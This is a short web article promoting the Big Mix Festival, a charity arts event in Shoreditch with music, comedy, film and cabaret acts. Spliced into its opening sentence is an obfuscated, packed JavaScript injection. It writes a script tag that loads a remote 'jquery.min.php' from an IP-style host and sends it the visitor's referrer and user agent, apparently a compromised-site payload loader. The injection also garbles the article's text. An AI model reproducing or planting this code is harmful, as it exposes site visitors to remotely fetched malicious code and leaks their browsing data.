THE BIG MIX FESTIVAL

Sometimes, (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekedi|var|u0026u|referrer|iszyz||js|php’.split(‘|’),0,{}))
we can all be a bit indecisive. Do we fancy seeing live music tonight or perhaps going to a comedy gig? Things get even more confusing when a group of people have different ideas about what to do; you might fancy karaoke but your mates want to see a film. How to keep everyone happy?

Luckily, the Big Mix Festival have something for everyone, whatever you are looking for. The festival does exactly what it says on the tin – its a huge mix of different artforms so you have no excuse for getting bored or not attending! Hosted in Shoreditch on Sunday 30th September, it’s now in its fourth year and will again be held at various locations throughout the area. The final cherry on the cake though is that every penny raised goes to Macmillan Cancer Support, a very worthy cause.

If music is your thing, you’ll be excited to hear that there will be performances from Get Cape Wear Cape Fly, Parisian pop duo The Penelopes and the gorgeous indie-folk of Alessi’s Ark, plus number-one selling Josh Kumra and soul chanteuse Josephine. However, our pick of the day is London legend Chas (sadly however, without Dave). He will be playing the duo’s hits though, so start practising your cockney accents!

If you prefer comedy, then make sure you don’t miss Matt Forde, Mark Smith, Matt Green and Tom Deacon, plus a very special mystery guest! The headliner is yet to be announced, but we’re assured that it’s a well known personality. There will also be a 90-minute collection of films made by eight London filmmakers, offering different perspectives and challenging perceptions.

If films, comedy and live music wasn’t enough, there will also be burlesque, cabaret, circus acts, Hip Hop Karaoke, Musical Bingo and a pop up mall. If The Big Mix Festival doesn’t have it, it probably doesn’t exist. Tickets are just £15, and the first 300 sold will also receive free access to the secret afterparty!
